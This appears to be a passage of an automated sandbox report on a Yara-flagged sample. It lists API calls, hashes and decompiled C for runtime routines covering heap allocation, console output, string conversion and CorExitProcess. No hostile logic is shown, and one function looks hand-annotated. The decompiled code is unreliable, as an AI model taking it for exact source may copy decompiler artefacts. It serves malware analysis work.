            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 0499962E
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 4bf98459cc1af584463b72bb13542caf677a4e3918758c780453eb2d1f901286
            • Instruction ID: 1227a7397e5ed90c0b955314657265927e109e20c84f33c5ba561556d65ac892
            • Opcode Fuzzy Hash: 4bf98459cc1af584463b72bb13542caf677a4e3918758c780453eb2d1f901286
            • Instruction Fuzzy Hash: 6F11DFB5D006498FDB20CF9AD444BDEFBF8AB88314F15852AD829A7600C375A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: fe370c34fcceb9914d01b1e8f28261e3e9edd1ffd0c30360bd30d80ce7ebc2ee
            • Instruction ID: 01c215feb84491ae7be7bedfe535f39198e2a83348454f99d3bf3391db63d837
            • Opcode Fuzzy Hash: fe370c34fcceb9914d01b1e8f28261e3e9edd1ffd0c30360bd30d80ce7ebc2ee
            • Instruction Fuzzy Hash: 901110B5804348DFDB20CF99C485BDEBBF8EB48314F10885AE958A7600C375A940CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: a57722e5aa676c7083d089a730636ca1cc995a189a57fd0f136893cf52eca891
            • Instruction ID: c36688a963a31c3d7b5a1fd1ed2798c706d5636d5f08f06cd255e36b97b5f605
            • Opcode Fuzzy Hash: a57722e5aa676c7083d089a730636ca1cc995a189a57fd0f136893cf52eca891
            • Instruction Fuzzy Hash: F511E0B58003489FDB20CF99D884BEEFFF8EB58314F14855AE969A7600C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: b74a1b216dd830d639d4ee87113f2bbf58c6b03a8a5e3bd05664c86dceeff4f4
            • Instruction ID: dedf07d23e0baf60c170b54d4ed65374ab4b10cc79ef9abd486c9827549684ea
            • Opcode Fuzzy Hash: b74a1b216dd830d639d4ee87113f2bbf58c6b03a8a5e3bd05664c86dceeff4f4
            • Instruction Fuzzy Hash: 1C11E3B58043489FDB20CF99D544BDEFBF8EB58314F10846AE959B7600C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 8219200bc4b921c8e9be97c3f85e58dd09a63fc758d603c7c452db0a12092b31
            • Instruction ID: c1c3d2a0be5c638b19ca3553d73d78c4204b86fe7475eb220a12855d568ede18
            • Opcode Fuzzy Hash: 8219200bc4b921c8e9be97c3f85e58dd09a63fc758d603c7c452db0a12092b31
            • Instruction Fuzzy Hash: 191113B58003889FDB10CF99D484BDEBFF8EB48310F10841AE859A7600C375A544CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 0000000D.00000002.704778808.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: efe950e76edbe80d65c5327d68ef709f07f3e5285938bf8240a2e408f43b5db3
            • Instruction ID: ae765a344d1102cde867b0f4c95c7d4a94adc36c04ce992d48515acae3eee3be
            • Opcode Fuzzy Hash: efe950e76edbe80d65c5327d68ef709f07f3e5285938bf8240a2e408f43b5db3
            • Instruction Fuzzy Hash: 8311F2B5C047898FDB14CF9AD448BDEFBF4EB48314F14852AE869A7600D378A544CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 0499FE9D
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 563209c8330cedab167305ccc6707a3f2b4e0d2ba4d4e3b5302ee8ca221a3b00
            • Instruction ID: f769714638053c92532673239a3b1c5a99977baa19fda3375f49bcea17559e83
            • Opcode Fuzzy Hash: 563209c8330cedab167305ccc6707a3f2b4e0d2ba4d4e3b5302ee8ca221a3b00
            • Instruction Fuzzy Hash: A51103B58003499FDB10CF99D585BDEFBF8EB48324F24852AD859A7601C374A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 468bfb909512da137b0f52238942b847688583d16aafd759250f3e87ba7e44c8
            • Instruction ID: 9b7e8db45cd8c0361ffdfb9565c6c7e8dd472552ff84d697b6af22b636e56ce2
            • Opcode Fuzzy Hash: 468bfb909512da137b0f52238942b847688583d16aafd759250f3e87ba7e44c8
            • Instruction Fuzzy Hash: 9611F2B58003489FDB10CF99D485BDEFFF8EB58324F14845AE868A7601C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 0499FE9D
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: eb06e3399325958f2fd87a79e05707537fcc057c1e8804c55d1de562bec2624d
            • Instruction ID: 0ee426aedaf3628791c9a15e952071c9730b367e2aa0880eaa5b392b0d2665be
            • Opcode Fuzzy Hash: eb06e3399325958f2fd87a79e05707537fcc057c1e8804c55d1de562bec2624d
            • Instruction Fuzzy Hash: 391100B58002498FDB10CF9AD488BDEFBF8EB48324F14852AE818A7200C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 0000000D.00000002.704778808.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: bee99720c869aa5acfab36cd32f397f1b7a18b5ed909f57d69c4ea1abd240d2a
            • Instruction ID: 1b7809e232397084f44f31bc69c12a35ec85f0d4fb84a0e60247928ac84bfeb6
            • Opcode Fuzzy Hash: bee99720c869aa5acfab36cd32f397f1b7a18b5ed909f57d69c4ea1abd240d2a
            • Instruction Fuzzy Hash: 091100B4C046498FCB14CF9AD448BCEFBF4EB48314F10852AE829A3200C378A544CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 061809a345782d5b53008d230f99b04a7eb46b20f046340a8605bcb5e3010742
            • Instruction ID: 091e8d50604723e2627cbf5f3ffafdfa06938a5ca63fdd6ad562744167e3fc46
            • Opcode Fuzzy Hash: 061809a345782d5b53008d230f99b04a7eb46b20f046340a8605bcb5e3010742
            • Instruction Fuzzy Hash: 0111F2B98042488FDB10CF99D585BDEBFF8EB48314F14885AE558A7600C375A544CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			#include <windows.h>
            			
            			/* ntdll export; declared here because the user-mode SDK headers do not expose it. */
            			PVOID NTAPI RtlAllocateHeap(PVOID HeapHandle, ULONG Flags, SIZE_T Size);
            			
            			/* Callees inside the sample; signatures inferred from the call sites. The
            			   __eflags argument the decompiler passed to E004068FD is a register artifact
            			   and is dropped here. */
            			int   E00403829(void);
            			void* E004068FD(void* ctx, long size);
            			int*  E00404831(void);   /* returns the address the error code 0xc is stored at */
            			
            			void* E00403ECE(void* __ecx, signed int _a4, signed int _a8) {
            				void* _t8;
            				void* _t12;
            				signed int _t13;
            				void* _t15;
            				signed int _t18;
            				long _t19;
            
            				_t15 = __ecx;
            				_t18 = _a4;
            				if(_t18 != 0) {
            					/* Overflow guard: refuse if count * size would exceed 0xffffffe0 bytes.
            					   The compare must be unsigned; the decompiler typed the operands as signed. */
            					_t13 = 0xffffffe0;
            					if((unsigned int)_t13 / (unsigned int)_t18 < (unsigned int)_a8) {
            						goto L8;
            					}
            				}
            				_t19 = _t18 * _a8;
            				if(_t19 == 0) {
            					_t19 = _t19 + 1;   /* never request a zero-byte block */
            				}
            				while(1) {
            					/* Flag 8 is HEAP_ZERO_MEMORY; the heap handle is read from a global. */
            					_t8 = RtlAllocateHeap( *(HANDLE*)0x4132b0, 8, _t19); // executed
            					if(_t8 != 0) {
            						return _t8;
            					}
            					/* Allocation failed: attempt recovery, then retry; give up if that fails. */
            					if(E00403829() == 0) {
            						goto L8;
            					}
            					_t12 = E004068FD(_t15, _t19);
            					if(_t12 == 0) {
            						goto L8;
            					}
            				}
            				L8:
            				 *((int*)(E00404831())) = 0xc;   /* 0xc = 12 (ENOMEM) */
            				return 0;
            			}

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004043D5,00000001,00000364,?,?,?,00404836,0040374F,?,00401678,00000000,00000002), ref: 00403F0F
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
            • Instruction ID: 17ee06be1e01d9d3fac17571a9f3cb3756af6567e7794f1bcf3b52ff780cb40a
            • Opcode Fuzzy Hash: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
            • Instruction Fuzzy Hash: BFF0B432904122A6DB216F269C05A6B3F6CEF81772B148537BD04F62D0CB38DE1186ED
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E00403E3D(void* __ecx, long _a4) {
            				void* _t4;
            				void* _t6;
            				void* _t7;
            				long _t8;
            
            				_t7 = __ecx;
            				_t8 = _a4;
            				if(_t8 > 0xffffffe0) {
            					L7:
            					 *((intOrPtr*)(E00404831())) = 0xc;
            					__eflags = 0;
            					return 0;
            				}
            				if(_t8 == 0) {
            					_t8 = _t8 + 1;
            				}
            				while(1) {
            					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
            					if(_t4 != 0) {
            						break;
            					}
            					__eflags = E00403829();
            					if(__eflags == 0) {
            						goto L7;
            					}
            					_t6 = E004068FD(_t7, __eflags, _t8);
            					_pop(_t7);
            					__eflags = _t6;
            					if(_t6 == 0) {
            						goto L7;
            					}
            				}
            				return _t4;
            			}

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
            • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 70%
            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
            				signed int _v8;
            				int _v12;
            				void* _v24;
            				signed int _t49;
            				signed int _t54;
            				int _t56;
            				signed int _t58;
            				short* _t60;
            				signed int _t64;
            				short* _t68;
            				int _t76;
            				short* _t79;
            				signed int _t85;
            				signed int _t88;
            				void* _t93;
            				void* _t94;
            				int _t96;
            				short* _t99;
            				int _t101;
            				int _t103;
            				signed int _t104;
            				short* _t105;
            				void* _t108;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t49 =  *0x412014; // 0x9c4b7b95
            				_v8 = _t49 ^ _t104;
            				_t101 = _a20;
            				if(_t101 > 0) {
            					_t76 = E004080D8(_a16, _t101);
            					_t108 = _t76 - _t101;
            					_t4 = _t76 + 1; // 0x1
            					_t101 = _t4;
            					if(_t108 >= 0) {
            						_t101 = _t76;
            					}
            				}
            				_t96 = _a32;
            				if(_t96 == 0) {
            					_t96 =  *( *_a4 + 8);
            					_a32 = _t96;
            				}
            				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
            				_v12 = _t54;
            				if(_t54 == 0) {
            					L38:
            					E004018CC();
            					return _t54;
            				} else {
            					_t93 = _t54 + _t54;
            					_t83 = _t93 + 8;
            					asm("sbb eax, eax");
            					if((_t93 + 0x00000008 & _t54) == 0) {
            						_t79 = 0;
            						__eflags = 0;
            						L14:
            						if(_t79 == 0) {
            							L36:
            							_t103 = 0;
            							L37:
            							E004063D5(_t79);
            							_t54 = _t103;
            							goto L38;
            						}
            						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
            						_t119 = _t56;
            						if(_t56 == 0) {
            							goto L36;
            						}
            						_t98 = _v12;
            						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
            						_t103 = _t58;
            						if(_t103 == 0) {
            							goto L36;
            						}
            						if((_a12 & 0x00000400) == 0) {
            							_t94 = _t103 + _t103;
            							_t85 = _t94 + 8;
            							__eflags = _t94 - _t85;
            							asm("sbb eax, eax");
            							__eflags = _t85 & _t58;
            							if((_t85 & _t58) == 0) {
            								_t99 = 0;
            								__eflags = 0;
            								L30:
            								__eflags = _t99;
            								if(__eflags == 0) {
            									L35:
            									E004063D5(_t99);
            									goto L36;
            								}
            								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
            								__eflags = _t60;
            								if(_t60 == 0) {
            									goto L35;
            								}
            								_push(0);
            								_push(0);
            								__eflags = _a28;
            								if(_a28 != 0) {
            									_push(_a28);
            									_push(_a24);
            								} else {
            									_push(0);
            									_push(0);
            								}
            								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
            								__eflags = _t103;
            								if(_t103 != 0) {
            									E004063D5(_t99);
            									goto L37;
            								} else {
            									goto L35;
            								}
            							}
            							_t88 = _t94 + 8;
            							__eflags = _t94 - _t88;
            							asm("sbb eax, eax");
            							_t64 = _t58 & _t88;
            							_t85 = _t94 + 8;
            							__eflags = _t64 - 0x400;
            							if(_t64 > 0x400) {
            								__eflags = _t94 - _t85;
            								asm("sbb eax, eax");
            								_t99 = E00403E3D(_t85, _t64 & _t85);
            								_pop(_t85);
            								__eflags = _t99;
            								if(_t99 == 0) {
            									goto L35;
            								}
            								 *_t99 = 0xdddd;
            								L28:
            								_t99 =  &(_t99[4]);
            								goto L30;
            							}
            							__eflags = _t94 - _t85;
            							asm("sbb eax, eax");
            							E004018E0();
            							_t99 = _t105;
            							__eflags = _t99;
            							if(_t99 == 0) {
            								goto L35;
            							}
            							 *_t99 = 0xcccc;
            							goto L28;
            						}
            						_t68 = _a28;
            						if(_t68 == 0) {
            							goto L37;
            						}
            						_t123 = _t103 - _t68;
            						if(_t103 > _t68) {
            							goto L36;
            						}
            						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
            						if(_t103 != 0) {
            							goto L37;
            						}
            						goto L36;
            					}
            					asm("sbb eax, eax");
            					_t70 = _t54 & _t93 + 0x00000008;
            					_t83 = _t93 + 8;
            					if((_t54 & _t93 + 0x00000008) > 0x400) {
            						__eflags = _t93 - _t83;
            						asm("sbb eax, eax");
            						_t79 = E00403E3D(_t83, _t70 & _t83);
            						_pop(_t83);
            						__eflags = _t79;
            						if(__eflags == 0) {
            							goto L36;
            						}
            						 *_t79 = 0xdddd;
            						L12:
            						_t79 =  &(_t79[4]);
            						goto L14;
            					}
            					asm("sbb eax, eax");
            					E004018E0();
            					_t79 = _t105;
            					if(_t79 == 0) {
            						goto L36;
            					}
            					 *_t79 = 0xcccc;
            					goto L12;
            				}
            			}

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
            • __alloca_probe_16.LIBCMT ref: 00407961
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
            • __alloca_probe_16.LIBCMT ref: 00407A46
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
            • __freea.LIBCMT ref: 00407AB6
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            • __freea.LIBCMT ref: 00407ABF
            • __freea.LIBCMT ref: 00407AE4
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 3864826663-0
            • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
            • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
            				signed int _v8;
            				signed char _v15;
            				char _v16;
            				void _v24;
            				short _v28;
            				char _v31;
            				void _v32;
            				long _v36;
            				intOrPtr _v40;
            				void* _v44;
            				signed int _v48;
            				signed char* _v52;
            				long _v56;
            				int _v60;
            				void* __ebx;
            				signed int _t78;
            				signed int _t80;
            				int _t86;
            				void* _t93;
            				long _t96;
            				void _t104;
            				void* _t111;
            				signed int _t115;
            				signed int _t118;
            				signed char _t123;
            				signed char _t128;
            				intOrPtr _t129;
            				signed int _t131;
            				signed char* _t133;
            				intOrPtr* _t136;
            				signed int _t138;
            				void* _t139;
            
            				_t78 =  *0x412014; // 0x9c4b7b95
            				_v8 = _t78 ^ _t138;
            				_t80 = _a8;
            				_t118 = _t80 >> 6;
            				_t115 = (_t80 & 0x0000003f) * 0x30;
            				_t133 = _a12;
            				_v52 = _t133;
            				_v48 = _t118;
            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
            				_v40 = _a16 + _t133;
            				_t86 = GetConsoleCP();
            				_t136 = _a4;
            				_v60 = _t86;
            				 *_t136 = 0;
            				 *((intOrPtr*)(_t136 + 4)) = 0;
            				 *((intOrPtr*)(_t136 + 8)) = 0;
            				while(_t133 < _v40) {
            					_v28 = 0;
            					_v31 =  *_t133;
            					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
            					_t123 =  *(_t129 + _t115 + 0x2d);
            					if((_t123 & 0x00000004) == 0) {
            						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
            							_push(1);
            							_push(_t133);
            							goto L8;
            						} else {
            							if(_t133 >= _v40) {
            								_t131 = _v48;
            								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
            								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
            								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
            							} else {
            								_t111 = E00407222( &_v28, _t133, 2);
            								_t139 = _t139 + 0xc;
            								if(_t111 != 0xffffffff) {
            									_t133 =  &(_t133[1]);
            									goto L9;
            								}
            							}
            						}
            					} else {
            						_t128 = _t123 & 0x000000fb;
            						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
            						_push(2);
            						_v15 = _t128;
            						 *(_t129 + _t115 + 0x2d) = _t128;
            						_push( &_v16);
            						L8:
            						_push( &_v28);
            						_t93 = E00407222();
            						_t139 = _t139 + 0xc;
            						if(_t93 != 0xffffffff) {
            							L9:
            							_t133 =  &(_t133[1]);
            							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
            							_v56 = _t96;
            							if(_t96 != 0) {
            								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
            									L19:
            									 *_t136 = GetLastError();
            								} else {
            									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
            									if(_v36 >= _v56) {
            										if(_v31 != 0xa) {
            											goto L16;
            										} else {
            											_t104 = 0xd;
            											_v32 = _t104;
            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
            												goto L19;
            											} else {
            												if(_v36 >= 1) {
            													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
            													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
            													goto L16;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            					goto L20;
            					L16:
            				}
            				L20:
            				E004018CC();
            				return _t136;
            			}

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
            • __fassign.LIBCMT ref: 004082E0
            • __fassign.LIBCMT ref: 004082FB
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 27%
            			E00403632(void* __ecx, intOrPtr _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _t10;
            				int _t12;
            				int _t18;
            				signed int _t20;
            
            				_t10 =  *0x412014; // 0x9c4b7b95
            				_v8 = _t10 ^ _t20;
            				_v12 = _v12 & 0x00000000;
            				_t12 =  &_v12;
            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
            				if(_t12 != 0) {
            					_t12 = GetProcAddress(_v12, "CorExitProcess");
            					_t18 = _t12;
            					if(_t18 != 0) {
            						E0040C15C();
            						_t12 =  *_t18(_a4);
            					}
            				}
            				if(_v12 != 0) {
            					_t12 = FreeLibrary(_v12);
            				}
            				E004018CC();
            				return _t12;
            			}

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 79%
            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
            				signed int _v8;
            				int _v12;
            				char _v16;
            				intOrPtr _v24;
            				char _v28;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				signed int _t34;
            				signed int _t40;
            				int _t45;
            				int _t52;
            				void* _t53;
            				void* _t55;
            				int _t57;
            				signed int _t63;
            				int _t67;
            				short* _t71;
            				signed int _t72;
            				short* _t73;
            
            				_t34 =  *0x412014; // 0x9c4b7b95
            				_v8 = _t34 ^ _t72;
            				_push(_t53);
            				E00403F2B(_t53,  &_v28, __edx, _a4);
            				_t57 = _a24;
            				if(_t57 == 0) {
            					_t52 =  *(_v24 + 8);
            					_t57 = _t52;
            					_a24 = _t52;
            				}
            				_t67 = 0;
            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
            				_v12 = _t40;
            				if(_t40 == 0) {
            					L15:
            					if(_v16 != 0) {
            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
            					}
            					E004018CC();
            					return _t67;
            				}
            				_t55 = _t40 + _t40;
            				_t17 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				if((_t17 & _t40) == 0) {
            					_t71 = 0;
            					L11:
            					if(_t71 != 0) {
            						E00402460(_t67, _t71, _t67, _t55);
            						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
            						if(_t45 != 0) {
            							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
            						}
            					}
            					L14:
            					E004063D5(_t71);
            					goto L15;
            				}
            				_t20 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				_t47 = _t40 & _t20;
            				_t21 = _t55 + 8; // 0x8
            				_t63 = _t21;
            				if((_t40 & _t20) > 0x400) {
            					asm("sbb eax, eax");
            					_t71 = E00403E3D(_t63, _t47 & _t63);
            					if(_t71 == 0) {
            						goto L14;
            					}
            					 *_t71 = 0xdddd;
            					L9:
            					_t71 =  &(_t71[4]);
            					goto L11;
            				}
            				asm("sbb eax, eax");
            				E004018E0();
            				_t71 = _t73;
            				if(_t71 == 0) {
            					goto L14;
            				}
            				 *_t71 = 0xcccc;
            				goto L9;
            			}

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
